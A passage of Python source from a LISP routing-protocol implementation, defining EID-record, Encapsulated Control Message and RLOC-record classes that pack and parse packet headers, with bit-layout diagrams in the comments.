self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (self.nonce in lisp_crypto_keys_by_nonce):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record(object):
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(old_div(ttl, 60)) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm(object):
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
class lisp_rloc_record(object):
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and name in lisp_geo_list):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and name in lisp_elp_list):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and name in lisp_rle_list):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and name in lisp_json_list):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string.encode()
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = b""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = b""
if (self.elp):
elp_recs = b""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = b""
if (self.rle):
rle_recs = b""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += (rle_node.rloc_name + "\0").encode()
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = b""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = b""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = b""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += (self.rloc_name + "\0").encode()
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
try:
packet = packet[0:-2] + self.encode_lcaf()
except:
lprint("Could not encode LCAF for RLOC-record")
#endtry
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
